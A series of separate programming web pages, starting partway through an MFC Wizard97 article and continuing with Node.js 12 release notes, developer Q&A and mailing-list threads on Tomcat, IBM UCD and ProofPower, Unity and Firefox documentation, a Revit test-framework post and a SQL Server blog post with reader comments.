> In HOL4, the contents of a theory are exported to and
> imported from text files. So if you have code associated
> with a theory that you want to export to users of the
> theory, you put that in a separate file and let users
> load that file. As ML doesn't have separate compilation,
> such code has to be provided as source. To make things
> easier for the user, HOL4 has its own make function,
> HOLmake, that automatically figures out dependencies
> between a set of things you want to bring together and
> loads them in the right order. Given that we don't have
> HOLmake and we don't allow export and import from files,
> this suggests to me that a contrib offering should
> comprise ML source to build the theory and provide any
> supporting ML functions etc.

Which is of course what maths_egs does, and my own stuff based on that makefile.

> Here is one possible set of conventions. The source of a
> contrib offering, XYZ, comprises a directory containing
> doc files together with a (UN*X) make file. The make
> file has a target that build a database called XYZ, that
> contains the contrib theories and associated ML and a
> minimal set of dependencies.
> Users who want to start
> from the contrib offering can just create children of
> the database. The make file also has a target that
> creates the ML source from the doc files and
> concatenates them into an appropriate order to give a
> single source file XYZ.ML (not XYZ.sml, since this will
> typically not be directly derived from a single .doc
> file). A built contrib offering would comprise the .doc
> files plus PDF of those (and/or DVI?) plus the database
> XYZ and the source file XYZ.ML.

I don't understand why you are proposing this departure from the pattern set by maths_egs.

> It would also be useful to maintain a ref to a list of
> strings identifying the loaded contrib offerings. This
> would be managed at the head and tail of XYZ.ML via
> access functions that allow it to be interrogated and
> extended. At the head we would have code to check that
> all the dependencies are satisfied and to report on
> anything that is missing (or you could be cleverer and
> attempt to load the missing dependencies - so this would
> be a bit like a mini-HOLmake, in which the contrib
> provider has to declare the dependencies). At the tail
> would be code to add the new contrib name to the list.
> The contrib directories could be organised as a tree
> with an initial contrib at the top that defines the list
> of loaded offerings and includes tools for working with
> it.
>
> As regards ML conventions, I would suggest that we don't
> mandate the rigid packaging of things into structures
> with signature constraints that ProofPower itself
> follows, but do encourage people at least to collect all
> the external interfaces into structures so that they can
> be accessed if the plain name is accidentally recycled.
>
> How does that sound? Is it definite enough for you to
> consider making a start?

It seems to me more of a departure from present practice than I would have thought necessary.
A question to answer is: what's wrong with just recommending that contribs follow the pattern set by maths_egs? I think there is only one problem, so long as there are not many contribs around, and that is that to build more than one independent contrib into the same database you would have to hack one of the makefiles. This would be fixed if the makefiles consulted an environment variable to see whether they should build into an existing database. If there were more contribs around then the next step would be to manage the dependencies between them in some way.

I'm a little surprised to see you hoping for me to contribute any significant amount of scripting, since my scripting skills are very basic and my standards are very poor. If I did do anything non-trivial you would probably feel compelled to completely rewrite it!

On the reorganisation of the ProofPower build system, I don't have a clear view of your objectives. Are you aiming to make it more like the usual open-source arrangement whereby others can contribute by accessing the repository directly, and in much the same manner as you do (except that you control what changes actually go into the issued ProofPower)? I would have thought that this could be done without any radical changes to the organisation; it's more a question of making the repository available and devising a protocol between you and other contributors for coming to agreements about what changes from them you are likely to accept. Not that I have any experience of working in such a way. I know only the kind of arrangement under which ProofPower was originally developed. But I don't really see why that old fashioned method could not work in a distributed context, especially with the new repositories available.

Roger

_______________________________________________
Proofpower mailing list
Proofpower@lemma-one.com
https://www.mail-archive.com/proofpower@lemma-one.com/msg00399.html
#include <Pt/Xml/InputSource.h>

Text input source for the XML reader.

Inherits InputSource. Inherited by StringInputSource.

This input source can read characters from a Unicode-based input stream, so it does not convert the encoding, but only parses the XML declaration. If no more characters can be read directly from the input stream buffer without blocking read operations, the virtual method onInput() is called. The number of available characters is returned, which can be 0 if no data is available. The derived input sources must call this method once the XML or text declaration is parsed, or if none was found. Normally, this is done in the virtual methods onGet() and onImport(), which are called by the public interface methods get() and import() when no buffer was set yet. The passed buffer and declaration are owned by the derived class.
http://pt-framework.net/htdocs/classPt_1_1Xml_1_1TextInputSource.html
Looking at the Airfoil web page, specifically, this one: The measurements are all given in fractions of the depth of the airfoil. So you have to scale them. I was working with what may turn out to be a 48" rudder for a boat based on this design. I'm waiting for some details from the engineer who really knows this stuff.

How do we turn these fractions into measurements for folks that work in feet and inches? We can use a spreadsheet -- and I suspect many folks would be successful spreadsheeting this data. For some reason, that's not my first choice. I worry about accidental copy and paste errors or some other fat-finger blunder in a spreadsheet. With code, it's easy to reproduce the results from the source as needed.

Here's the raw data.

Part 1. Fractions.

    from fractions import Fraction

    class Improper(Fraction):
        def __str__( self ):
            whole= int(self)
            fract= self-whole
            if fract == 0:
                return '{0}'.format(whole)
            if whole == 0:
                return '{0}'.format(fract)
            return '{0} {1}'.format(whole,fract)

The idea is to be able to produce improper fractions like 47 ½" or 24" or ¾". My Macintosh magically rewrites fractions into a better-looking Unicode sequence. I didn't include that feature in the above version of Improper. Mostly because in Courier, the generic fractions look kind of icky.

The raw data is readable as a kind of CSV file.

    import csv

    def get_data( source ):
        rdr= csv.reader( source, delimiter=' ', skipinitialspace=True )
        heading= next(rdr)
        print( heading )
        for row in rdr:
            yield float(row[0]), float(row[1])

That saves fooling around with parsing -- we get the profile numbers from the raw data as a pair of floats.

Finally, the report.
    def report( source, depth, unit ):
        scale= 16  # 16ths of an inch
        for d, t in get_data( source ):
            d_in, t_in = d*depth, t*depth
            d_scale = Improper( int(d_in*scale), scale )
            t_scale = Improper( int(t_in*scale), scale )
            print( '{0:6.2f} {unit} {1:6.2f} {unit} | {2:>8s} {unit} {3:>8s} {unit}'.format(
                d_in, t_in, str(d_scale), str(t_scale), unit=unit) )

This gives us a pleasant-enough table of the measurements in decimal places and fractions. We can use this for any of the variant airfoils available. Here's the top-level script.

    import urllib.request

    with urllib.request.urlopen( "" ) as source:
        seligdatfile= source.read().decode("ASCII")

    import io

    with io.StringIO( seligdatfile ) as source:
        report( source, depth=48, unit="in." )

I'm guessing the data files are ASCII encoded, not UTF-8. It doesn't appear to matter too much, and it's an easy change to make if they track down an airfoil data file that has a character that's not ASCII, but UTF-8.
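As a standalone check of the snap-to-16ths idea used in the report, here is a self-contained sketch. It deliberately re-implements, rather than imports, the Improper formatting above, and the helper name is mine, not from the post:

```python
from fractions import Fraction

# Snap a decimal measurement down to the nearest 1/16 inch and render it
# as an improper fraction, mirroring the Improper class in the post.
def to_sixteenths(measure_in):
    frac = Fraction(int(measure_in * 16), 16)
    whole = int(frac)
    rest = frac - whole
    if rest == 0:
        return '{0}'.format(whole)
    if whole == 0:
        return '{0}'.format(rest)
    return '{0} {1}'.format(whole, rest)

print(to_sixteenths(1.5625))   # 1 9/16
print(to_sixteenths(0.75))     # 3/4
print(to_sixteenths(24.0))     # 24
```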
http://slott-softwarearchitect.blogspot.com/2014/01/not-in-hamcalc-but-perhaps-should-be.html
The DHT22 is a low cost, single wire sensor which measures temperature and relative humidity. I started out just playing around with this thing, just wiring it to a Pi to see it working. But I got sucked in much deeper into thinking about how it worked and assessing its limitations.

Output Data Stream

The DHT22 produces a serial stream of data. In other words the sensor has just one "wire" over which it sends data and receives commands. It does this by simply raising and lowering the voltage level, and varying the amount of time that the wire is either "high" or "low". In my circuit "high" is approximately 3.3 Volts, while low is approximately 0 Volts.

A logical 1 waveform looks like this:- [waveform diagram]

While logical 0 is like this:- [waveform diagram]

There should be 40 of these zeros and ones in a complete data set, and this data stream may start out looking something like this:-

00000010 00110101 0000...

The first 2 bytes contain the rh (relative humidity) value. In this example:-

02hex & 34hex = 0234hex = 564

As data values are 10 x actual readings, 564 is an rh of 56.4%. Likewise, the third and fourth bytes represent 10 x the temperature reading.

The Checksum

In order to validate the integrity of the sensor's transmitted data, the unit generates a simple checksum, which occupies the last byte of the 40 bit data stream. This sensor calculates the checksum by adding the 4 data bytes together, and using only the lower 8 bits of the result as the 1 byte checksum. Here is an example where the rh is 60.2% and the temperature is 23.1'C:-

60.2%: 602 = 025Ahex, so byte 1 = 02hex and byte 2 = 5Ahex
23.1: 231 = 00E7hex, so byte 3 = 00hex and byte 4 = E7hex
02h + 5Ah + 00h + E7h = 143h

So the high byte is discarded, and the checksum becomes 43hex. When our system [software] reads this data it simply repeats the process and checks the result against the checksum.
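The decode-and-verify procedure just described can be sketched in a few lines. This is an illustrative Python model of the arithmetic, not the driver code used later in this post, and it ignores the negative-temperature encoding:

```python
# Decode a 5-byte DHT22 frame and verify its checksum, using the
# worked example above (rh 60.2 %, temperature 23.1 'C).
def decode_dht22(frame):
    """frame: five bytes as read from the sensor."""
    assert len(frame) == 5
    checksum = sum(frame[0:4]) & 0xFF          # keep only the low 8 bits
    if checksum != frame[4]:
        return None                            # transmission error: drop reading
    rh = (frame[0] << 8 | frame[1]) / 10.0     # values are 10x the reading
    temp = (frame[2] << 8 | frame[3]) / 10.0
    return rh, temp

print(decode_dht22([0x02, 0x5A, 0x00, 0xE7, 0x43]))   # (60.2, 23.1)
print(decode_dht22([0x02, 0x5A, 0x00, 0xE7, 0x42]))   # None (bad checksum)
```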
If there was a data transmission or reception error, our calculated checksum will not match the checksum transmitted from the sensor, so we can ignore this bad data. There are of course a couple of exceptions. If the data error is in the 1st or 3rd bytes, this error will not be detected by the checksum, because we only use the lower 8 bits of the result. Also, it is possible that 2 or more errors may cancel one another out (e.g. a -1 error in rh and a -1 error in the received checksum).

However, in the first case, an error in the 1st or 3rd bytes will make a very large difference to either the rh or temperature. For example, 01hex in the first byte is 256. This would be a change of 25.6% rh (or 25.6'C for the 3rd byte). In the second case? Well, someone with good maths abilities could probably tell me the likelihood of canceling errors.

Connecting sensor to Pi

The DHT22 is a four terminal package, but only pins 1, 2 & 4 are used. I simply plugged it into a breadboard and wired as follows:- Initially I fitted a 10k Ohm resistor to pins 1 & 2. During testing I replaced this with a 4.7k and also added a 0.1uF capacitor across the supply pins (1 & 4), although these changes did not appear to make any significant improvement in performance.

Testing with wiringPi

Once again I'm relying on Gordon's wiringPi software, and here are a few points regarding the notes that follow. Once wiringPi is downloaded (use the latest snapshot) it should be unzipped and located on the RaspberryPi in a suitable folder (e.g. /home/pi/wiringPi-version). The Pi uses the pcManFM file manager. If you navigate to a folder then press F4, a terminal window will open at that point in the file system. So where I say "run sudo ./rht03 in examples", I mean navigate to /home/pi/wiringPi-version/examples, press F4, and type sudo ./rht03 in the terminal.

So let's start by building wiringPi:-

Run ./build from your wiringPi-version folder.
The terminal should show something like this:-

    wiringPi Build script
    =====================

    WiringPi Library
    [UnInstall]
    [Compile] wiringPi.c
    [Compile] wiringSerial.c
    [Compile] wiringShift.c
    [Compile] piHiPri.c
    .....
    All Done

Now open rht03.c in the examples folder (e.g. edit in LeafPad). Change the pin number to suit your wiring using wiringPi pin numbers, in my case:-

    #define RHT03_PIN 15

Run make rht03 from the examples folder. Now run the demo program by typing sudo ./rht03 from the examples folder. You may start to see rh and temperature readings displayed in your terminal. However, you may also notice your Pi soon becomes paralyzed as the cpu load sits at 100%. Put the little critter out of its misery by hitting <ctrl><c>.

I opened rht03.c again and added a 5 second sleep:

    #include <stdio.h>
    #include <unistd.h>
    #include <wiringPi.h>
    #include <maxdetect.h>

    #define RHT03_PIN 15

    ...

    for (;;)
    {
      delay (100) ;
      sleep(5);
      if (!readRHT03 (RHT03_PIN, &newTemp, &newRh))

After saving, making and running rht03 again, I found the cpu load to be reasonably low, and the screen spat out readings from time to time. Sometimes the readings appeared 5 seconds apart, and sometimes there were much longer gaps. I had another look at rht03.c and noticed that it doesn't output results unless they have changed since last time, hence the apparently erratic display rate.

This demo program calls readRHT03 which is in ../devLib/maxdetect.c. This file contains most of the routines used to talk to the DHT22 sensor. Very basically: readRHT03 calls maxDetectRead which "wakes up" the sensor by holding the data line low for 10ms and then pulsing it high for 40us. It then calls maxDetectLowHighWait and waits for the data line to switch from a high to a low state (this is the signal from the sensor indicating that data transmission is about to follow).
The maxDetectRead routine then calls maxDetectClockByte which checks if the data line is a 1 or a 0 (after a 30us delay) and uses this to build up the data, bit-by-bit. I decided to sprinkle this code with printf so I could see more closely what was going on.

    #include <stdio.h>

    int maxDetectRead (const int pin, unsigned char buffer [4])
    {
      int i ;
      unsigned int checksum ;
      unsigned char localBuf [5] ;

      // Wake up the RHT03 by pulling the data line low, then high
      // Low for 10mS, high for 40uS.
      pinMode (pin, OUTPUT) ;
      digitalWrite (pin, 0) ;
      delay (10) ;
      digitalWrite (pin, 1) ;
      delayMicroseconds (40) ;
      pinMode (pin, INPUT) ;

      // Now wait for sensor to pull pin low
      maxDetectLowHighWait (pin) ;

      // and read in 5 bytes (40 bits)
      for (i = 0 ; i < 5 ; ++i)
        localBuf [i] = maxDetectClockByte (pin) ;

      checksum = 0 ;
      for (i = 0 ; i < 4 ; ++i)
      {
        buffer [i] = localBuf [i] ;
        printf("localbuf: %d: %#x\n", i, localBuf [i]);
        checksum += localBuf [i] ;
      }
      checksum &= 0xFF ;
      printf("checksum: %#x...Buff: %#x....", checksum, localBuf[4]);

      return checksum == localBuf [4] ;
    }

    /*
     * readRHT03:
     *      Read the Temperature & Humidity from an RHT03 sensor
     *********************************************************************************
     */

    int readRHT03 (const int pin, int *temp, int *rh)
    {
      static unsigned int nextTime   = 0 ;
      static int          lastTemp   = 0 ;
      static int          lastRh     = 0 ;
      static int          lastResult = TRUE ;

      unsigned char buffer [4] ;

      // Don't read more than once a second
      if (millis () < nextTime)
      {
        *temp = lastTemp ;
        *rh   = lastRh ;
        return lastResult ;
      }

      lastResult = maxDetectRead (pin, buffer) ;
      printf("lastResult: %d\n", lastResult);

      if (lastResult)
      {
        *temp = lastTemp = (buffer [2] * 256 + buffer [3]) ;
        *rh   = lastRh   = (buffer [0] * 256 + buffer [1]) ;
        nextTime = millis () + 2000 ;
        return TRUE ;
      }
      else
      {
        return FALSE ;
      }
    }

After running ./build in the wiringPi-version folder and restarting sudo ./rht03, I get an output in terminal like this.
You can see a checksum error for the data block with lastResult: 0. I'm probably seeing approx 15% of results with checksum errors. I don't know if this is typical for this sensor.

Testing with Gambas

In order to use Gambas to write a test program, I hacked wiringPi (similar to the method I used here) to create a single library that supports this temperature sensor. The wiringPi routine was then declared in Gambas like this:-

    Public Extern readRHT03(iPin As Integer, ptrTemp As Pointer, ptrRH As Pointer) As Integer

...and I used a Gambas routine a bit like this:-

    Public Sub ReadTemp()
      Dim iReply As Integer
      Dim intTemp As Integer
      Dim intRH As Integer

      iReply = readRHT03(15, VarPtr(intTemp), VarPtr(intRH))
      If iReply > 0 Then
        Inc lngReadings
        If blnStarted Then
          If intTemp > intLastTemp + 50 Or intTemp < intLastTemp - 50 Then
            Inc lngErrorCount
          Endif
          If intRH > intLastHumid + 50 Or intRH < intLastHumid - 50 Then
            Inc lngErrorCount
          Endif
        Else
          blnStarted = True
        Endif
        intLastTemp = intTemp
        intLastHumid = intRH
        Label1.text = CStr(intTemp / 10) & "'C"
        Label2.text = CStr(intRH / 10) & "%"
      Endif
    End

Note that intTemp and intRH are 10x the actual value, so have to be divided by 10 for display. This test program took readings from the DHT22 at 10 second intervals and also recorded the total number of readings and the number of errors. I did not record checksum errors; I only recorded readings which were either more than 5'C or 5% different from the previous reading. So this error count may include data errors in the high order data byte which do not affect the calculated checksum. In approximately 3500 readings I recorded 5 errors.

Conclusion

Since the DHT22 is designed to measure temperature and relative humidity in an environment like a house, it is not too much of a problem to drop readings when a checksum error is detected, or when a reading is clearly very different from previous and subsequent readings. So with that in mind I should be able to find a use for this thing.
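The plausibility screen in the Gambas ReadTemp() routine above boils down to a simple rule: flag any reading that jumps more than 50 tenths (5.0 units) from the previous one. Here is a hedged Python restatement, with the function name my own rather than from the post:

```python
# Count readings that differ from the previous reading by more than
# `limit` tenths of a unit -- the same screen as the Gambas test code.
def count_spikes(readings, limit=50):
    errors = 0
    last = None
    for value in readings:
        if last is not None and abs(value - last) > limit:
            errors += 1
        last = value        # like the Gambas code, always track the last raw reading
    return errors

# tenths of a unit, as delivered by the sensor
print(count_spikes([231, 232, 489, 233, 234]))   # 2: one jump up, one back down
```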
See also: DHT22: is it damp under my house?

Thanks man, this is only guide that got my AM2302 working without any problems, cheers!
http://captainbodgit.blogspot.com/2014/12/dht22-temperaturerh-sensor-on.html
update must receive output of the form (y_pred, y): y_pred must be a sequence of tokens, and y a list of reference token sequences.

device (Union[str, torch.device]) – specifies which device updates are accumulated on. Setting the metric’s device to be the same as your update arguments ensures the update method is non-blocking. By default, CPU.

Example:

from ignite.metrics import Rouge

m = Rouge(variants=["L", "2"], multiref="best")

candidate = "the cat is not there".split()
references = [
    "the cat is on the mat".split(),
    "there is a cat on the mat".split()
]

m.update((candidate, references))

m.compute()
>>> {'Rouge-L-P': 0.6, 'Rouge-L-R': 0.5, 'Rouge-L-F': 0.5, 'Rouge-2-P': 0.5, 'Rouge-2-R': 0.4, 'Rouge-2-F': 0.4}

New in version 0.4
https://pytorch.org/ignite/v0.4.5/generated/ignite.metrics.Rouge.html
This guide explains the steps required to start using Bluetooth low energy (BLE) beacons to provide proximity-based experiences for your users. The steps you must take here depend on the way you plan to use your beacons.

Ways to use beacons

To add an attachment:

- Click the down-arrow next to View beacon details and select attachments.
- Enter the Type and Value for the attachment. The value for Namespace is fixed, depending on the Google Developers Console project that you selected.
- Click the plus sign (+) to add the attachment.

Beacon Tools app

You can use the Beacon Tools app to associate attachments with beacons by following these steps:

- Install the Beacon Tools app (Android, iOS).
- Launch the app. You'll see a list of beacons near you. If your beacon has been registered with Google, it will appear under the Registered tab. If not, you'll need to register your beacon.
- Tap your beacon in the list to select it.
- To add a new attachment, click the plus sign (+) next to Attachments, and enter the attachment data.
- Under Namespaced Type enter a two-letter language code. Currently the namespace value is fixed to the Google Developers Console project that the beacon was registered under. The ability to edit the namespace is coming soon.
- Under Data enter an attachment. For example: Beacon edd1ebeac04e5defa023 at your service!
- Tap the checkmark icon to save your changes.

Developer Guidelines

As you build proximity-based experiences for your users, you might collect and manage user information through your apps. For example, some of the information that you collect may allow you to infer a user's location or activity. Your users trust you to do the right thing with their data. It's your responsibility to do so, but keep these key principles in mind:

- Comply with all relevant privacy laws and regulations when handling user information.
- Provide users with (and follow) a privacy policy explaining what user information you collect and how you use it.
- Honor user requests to delete their data.
- Carefully review the Terms of Service before using the Proximity Beacon API, and other terms of service which may apply to your use of other Google APIs, for example the Nearby Messages API.
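Returning to the attachment steps earlier in this guide: an attachment is ultimately stored as a namespaced type plus base64-encoded data. The sketch below shows, in hedged form, what building such a JSON body could look like; the namespace, type, and helper name are illustrative assumptions, not values taken from this guide, and the exact request shape should be checked against the Proximity Beacon API reference.

```python
import base64
import json

# Build a JSON body for a beacon attachment: the attachment data is
# base64-encoded, and the namespaced type pairs a project namespace
# with a type (here, a two-letter language code, as in the steps above).
def attachment_body(namespace, attachment_type, text):
    return json.dumps({
        "namespacedType": "%s/%s" % (namespace, attachment_type),
        "data": base64.b64encode(text.encode("utf-8")).decode("ascii"),
    })

body = attachment_body("my-project", "en",
                       "Beacon edd1ebeac04e5defa023 at your service!")
print(body)
```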
https://developers.google.com/beacons/get-started
Hello,

Our organization is relatively new to JIRA (less than 2 years old) and a few months back we purchased ScriptRunner to further customize our setup. We would like to create a "dropdown" field that would pull static values from another "text" field. These fields are used on different screens. I think we may have to include a filter with the below logic inside a script to load values for the dropdown field.

Custom Field 1 (existing) - Subsystem name (text)
Custom Field 2 (new) - Application (dropdown)

"Application" field available values = "Subsystem name" field values (CONDITION -> project = "eRA Component Model" AND issuetype = Subsystem AND isactive = Yes)

How do I implement this? Please advise.

Thanks,
Venkat

Hi Venkat

You can get the project through the getIssueContext(), for example

    def selectedProjectKey = getIssueContext().getProjectObject().getKey()
    // or for the name
    def selectedProjectName = getIssueContext().getProjectObject().getName()

regards, Thanos

Thanks a lot, Thanos. That worked. However, I couldn't get the behaviour to work on "Project" field change; I had to use another field, like "Issue Type", then the above script would work as desired. BTW, the above solution is to make a text field a select field with JQL output that lists Issues from another project. Is there a way to list values of a particular field and only that field (no Issue key) as values of the select field? Does it have to be like an embedded SQL of some sort? Thanks for your assistance. Venkat.

Oh yes sorry forgot to mention that it should have been an initialiser script. For the second part of your question could you please give an example?

No problem. Thanks. For the second part of the question, from my above example, is it possible to not show the Issue key, but only display the summary field values? Please see the attached image.
In the image, I don't want to see "ECM-2" in the dropdown. Thanks. (attachment: selectlistconversions.jpg)

Hi Venkat, One way would be to create your own rest endpoint for it, and then call this one in your conversionList. Very similar to the documentation example Pick Issue from remote JIRA, and having something like

    response.sections.each { section ->
        section.issues.each {
            it.remove("summary")
            it.remove("summaryText")
        }
    }

Let me try to see if there is a way via an ajaxOption (I have to check the src code).

regards, Thanos

Thanks Thanos. Let me take a look at your suggestions and get back to you.

Hi Thanos, I tried the example you pointed me to and it doesn't seem to pull any Issues (see the attachment). Can you please tell me what's missing?

    import com.onresolve.scriptrunner.runner.rest.common.CustomEndpointDelegate
    import groovy.json.JsonBuilder
    import groovy.transform.BaseScript
    import groovyx.net.http.ContentType
    import groovyx.net.http.HTTPBuilder
    import groovyx.net.http.Method
    import javax.ws.rs.core.MultivaluedMap
    import javax.ws.rs.core.Response

    @BaseScript CustomEndpointDelegate delegate

    pickRemoteIssue() { MultivaluedMap queryParams ->
        //def query = queryParams.getFirst("query") as String
        def jqlQuery = "project = RCDC"
        def httpBuilder = new HTTPBuilder("")
        def response = httpBuilder.request(Method.GET, ContentType.JSON) {
            uri.path = "/rest/api/2/issue/picker"
            uri.query = [currentJQL: jqlQuery]
            response.failure = { resp, reader ->
                log.warn("Failed to query JIRA API: " + reader.errorMessages)
                return
            }
        }
        response.sections.each { section ->
            section.issues.each {
                // delete the image tag, because the issue picker is hard-coded
                // to prepend the current instance base URL.
                it.remove("img")
            }
        }
        return Response.ok(new JsonBuilder(response).toString()).build()
    }

Thanks Thanos. I was able to use the sample - to set up an initialiser script to load JIRA Issues from another project into a text field as a select list. However, I need to auto-select the value from the dropdown based on the out-of-box project selection. I am now using the below script on the "Project" field change behaviour. Can you please assist in the highlighted areas?
    def selectedProject = getFieldById(getFieldChanged()).getValue()
    def jqlSearchField = getFieldByName("Subsystem")

    jqlSearchField.convertToSingleSelect([
        ajaxOptions: [
            url           : getBaseUrl() + "/rest/scriptrunner-jira/latest/issue/picker",
            query         : true,
            data          : [
                currentJql: "project = 'eRA Component Model' AND Summary ~ ${selectedProject} ORDER BY key ASC",
            ],
            formatResponse: "issue"
        ],
        css        : "max-width: 500px; width: 500px",
    ])

I have trouble using the "Project" field in behaviours. Thanks a lot in advance. Venkat.
https://community.atlassian.com/t5/Marketplace-Apps-questions/Script-Runner/qaq-p/224668
Using our previous example on displaying a text string, we will go through the process of how we created a Text object, set the text color, and set the font of the text. The 4 lines of statement that we used are shown here:

    Text txt = new Text();
    txt.setFill(Color.BLUE);
    txt.setFont(Font.font("Times New Roman", 36));
    txt.setText("Hello World");

In the first line above, we create a Text object with the object name txt. As txt is now a Text object, we can make use of the methods that are associated with the Text object. The methods that we use here are setFill, setFont and setText. All these are member functions of the Text object.

Notice that in our import statements, we have 2 classes related to Font and Color. Font and Color are accessed through static members: we do not have to declare an instance of the Color class to access its property, which is BLUE in this case. We set the color property by using Color.BLUE, where Color is the name of the class. The same goes for setting the font type, where we call the static method Font.font(); Font is the class name, as shown in the import statement.

    package javafxapplication4;

    import javafx.application.Application;
    import javafx.scene.Scene;
    import javafx.scene.text.Text;
    import javafx.scene.layout.StackPane;
    import javafx.scene.paint.Color;
    import javafx.scene.text.Font;
    import javafx.stage.Stage;

    public class JavaFXApplication4 extends Application {

        @Override
        public void start(Stage primaryStage) {
            primaryStage.setTitle("JavaFX Program!");
            StackPane stackpane = new StackPane();
            Scene scene = new Scene(stackpane, 300, 250);
            primaryStage.setScene(scene);

            Text txt = new Text();
            txt.setFill(Color.BLUE);
            txt.setFont(Font.font("Times New Roman", 36));
            txt.setText("Hello World");
            stackpane.getChildren().add(txt);

            primaryStage.show();
        }

        public static void main(String[] args) {
            launch(args);
        }
    }
http://codecrawl.com/2015/03/11/javafx-setting-the-text-and-display-it/
CC-MAIN-2017-04
refinedweb
312
61.63
Is there a structure wherein I can have strings in col1, doubles in col2, and integers in col3? Theoretically, a 2D array, but that would be messy.

I would suggest making each "row" an object, which has values for col1, col2, and col3, and then putting the rows in an array. That would be the cleanest solution.

Rather than using parallel arrays to store data, use a CLASS. A class might be structured something like:

    public class MyDataStructure {
        // instance variables
        String columnOne;
        double columnTwo;
        int columnThree;

        // a constructor that sets each instance variable
        public MyDataStructure( String columnOne, double columnTwo, int columnThree ) {
            this.columnOne = columnOne;
            this.columnTwo = columnTwo;
            this.columnThree = columnThree;
        } // end constructor
    } // end class MyDataStructure
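Building on the answer above, here is one way the rows-in-an-array idea might look in use. The demo class and sample values are mine; MyDataStructure is reproduced from the answer, minus the public modifier so both classes fit in one file:

```java
// Reproduced from the answer above (without `public`) so the example compiles on its own.
class MyDataStructure {
    String columnOne;
    double columnTwo;
    int columnThree;

    MyDataStructure(String columnOne, double columnTwo, int columnThree) {
        this.columnOne = columnOne;
        this.columnTwo = columnTwo;
        this.columnThree = columnThree;
    }
}

public class MyDataStructureDemo {
    public static void main(String[] args) {
        // Each "row" is one object; the rows live in a single array,
        // replacing three parallel arrays of String, double, and int.
        MyDataStructure[] rows = {
            new MyDataStructure("alpha", 1.5, 10),
            new MyDataStructure("beta", 2.75, 20),
        };
        for (MyDataStructure row : rows) {
            System.out.println(row.columnOne + " | " + row.columnTwo + " | " + row.columnThree);
        }
    }
}
```

Each element of the array keeps its three typed values together, so a row can never get out of sync the way parallel arrays can.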
http://www.javaprogrammingforums.com/member-introductions/35039-array-type-structure-different-types-different-columns.html
CC-MAIN-2014-15
refinedweb
146
57.06
Arjan van de Ven schrieb:
>> Hence the config option for the kernel - it's philosophy at Gentoo to
>> make choices available to users how they want their systems to behave,
>> even at the expense of added complexity and the need to "understand" how
>> things work in the first place.
>
> While I am not opposed to choice, I am opposed to having too finegrained
> kernel config options. In your view, every single kernel patch would be
> a config option... I much rather have config options for "important" big
> changes, not for something this small. Another argument is that this
> kind of userspace interface is better off being always there or never;
> making this variable serves no-one.

Hi again,

As said, I'm not voting for getting the specific example patch into the kernel source. All I came for and would like to see is the two numbers in the upstream header file, to avoid future namespace clashes (as said in the original mail). I honestly don't know how to follow the discussion on implementing this kind of entropy, given via auxv, to userland. If you (the kernel devs) think it makes sense, then you as the upstream devs can do it all the way you like it; I can always change it with a patch for my own needs in my own sources. I can't say much about any of this because I don't know what is important from your point of view as kernel maintainers and what is not. I understand your concerns and know that we are talking from different perspectives, so it is probably normal that our interests and technical solutions vary. However, as said, the only thing important to me is to not use "arbitrarily" chosen numbers for the AT_ENTROPY1 and AT_ENTROPY2 values and later have problems when my "private" numbers are suddenly assigned to a different thing by "official" kernel devs.
That would be bad for me, and it is what I want to avoid in the first place. So please tell me what I can do about the requirements and the timing, and what the usual process is for asking to get the numbers into the kernel, so I can start using them for my own work.

Thanks in advance,
Alex
https://lkml.org/lkml/2007/6/18/129
CC-MAIN-2017-22
refinedweb
412
61.7
Description

This plugin integrates your website with the Workshop Butler workshop management platform. It helps you promote trainings and other events, accept registrations online, and give visitors detailed information about your trainers and workshops. It comes with five default themes and many options to customise it for your needs. When you add a new event or trainer to Workshop Butler, they automatically appear on your website, making the process of workshop and license management fast and easy.

Languages

The public pages are available in English, Spanish, French, German, Portuguese, Dutch and Norwegian. The administration panel is available only in English.

Installation

- Open your WordPress dashboard
- Go to Plugins -> Add New
- Click Activate

After the activation, go to Settings -> Workshop Butler, enter your API key and click Save. Then you can open yourwebsite.com/schedule to see the list of events.

During the activation, the plugin adds five pages:

- Schedule (/schedule) contains the event schedule
- Event (/schedule/event) hosts the detailed information for each event
- Trainer List (/trainer-list) contains the list of all trainers
- Trainer (/trainer-list/profile) for the trainer profiles
- Registration (/registration) for the event registration

You can change them later.

Can I use the plugin without having a Workshop Butler account?

No. However, you can easily register for a free trainer account.

Can I use my own theme?

Yes. The Workshop Butler plugin for WordPress comes with a number of options for customization.

What to do if I found a bug?

Please, open an issue here

What to do if I have a question?

Please, open an issue here

Reviews

There are no reviews for this plugin yet.

Contributors & Developers

"Workshop Butler" is open source software.
The following people have contributed to this plugin.

Changelog

- Fix an issue with tax exempt for brands integration

3.1.5
- Disable theme customizer integration

3.1.4
- Update compatibility up to WP 5.9

3.1.2
- Add support for "jS" and "dS" formats for schedule dates

3.1.1
- Fix "Confirmed" label on an event page

3.1.0
- Add the Estonian language
- Add VAT calculation for ticket price

3.0.3
- Fix schedule shortcode elements option and schedule time formatting

3.0.2
- Fix schedule filters for old templates
- Use default jQuery
- Bump lower supported WP version to 5.5

3.0.1
- Fix default filters for schedule

3.0.0
- Completely new template system
- New templates layout

2.14.0
- Add PayPal payments

2.13.9
- Fixes undefined property error notice

2.13.8
- Fixes a JS error on the registration form when jQuery doesn't work in some rare cases
- Adds filter by multiple categories

2.13.7
- Rolls back the changes from the previous fix and uses another way to fix a fatal error with Buddyboss

2.13.6
- Fixes a fatal error happening on some pages when Buddyboss is installed

2.13.5
- Fixes translations and support for Macedonian, Hungarian and Hebrew languages

2.13.4
- Fixes a critical error visible in the logs but not affecting any behaviour

2.13.3
- Fixes registration on canceled events
- Fixes Yoast SEO compatibility
- Fixes an issue with incorrect featured event highlighting

2.13.2
- Fixes an issue with incorrect error handling from the server
- Fixes an issue with registration in IE

2.13.1
- Fixes a small translation issue in the German language

2.13.0
- Adds a badges attribute to the wsb_trainer_list shortcode which shows trainers who have at least one of the given badges (use badge ids for that)

2.12.0
- Fixes a bug with incorrect Hebrew language
- Adds a new wsb_schedule_language shortcode which renders the column of workshop languages
- Adds support for customizable query parameters for the schedule
- Reports a bit more data (request ID, user agent) on errors
- Adds support for featured events in schedules and on-page event lists
- Fixes the output of ordered/unordered lists in event descriptions and trainer profiles
- Adds a new element, the Next event block. For now, it includes only a button containing the link to the next event (either any event, or one from a specified category/event type)

2.11.2
- Fixes the "mailto" button on the trainer's page

2.11.1
- Fixes the [wsb_trainer_list_rating] shortcode which didn't show the trainer's rating

2.11.0
- Improves the output of event dates
- Adds an only_featured parameter to wsb_schedule to show only featured workshops
- Fixes an issue with incorrect workshop dates in some border cases
